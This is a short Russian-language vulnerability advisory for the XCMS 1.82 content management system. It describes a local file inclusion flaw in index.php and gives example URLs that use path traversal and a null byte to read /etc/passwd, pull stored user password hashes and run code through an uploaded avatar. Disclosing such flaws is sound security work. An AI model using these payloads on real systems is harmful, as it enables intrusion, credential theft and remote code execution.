Программа: XCMS 1.82
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и получить доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
LFI:
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd\0
Получение Hash:
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb\0
RCE:
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0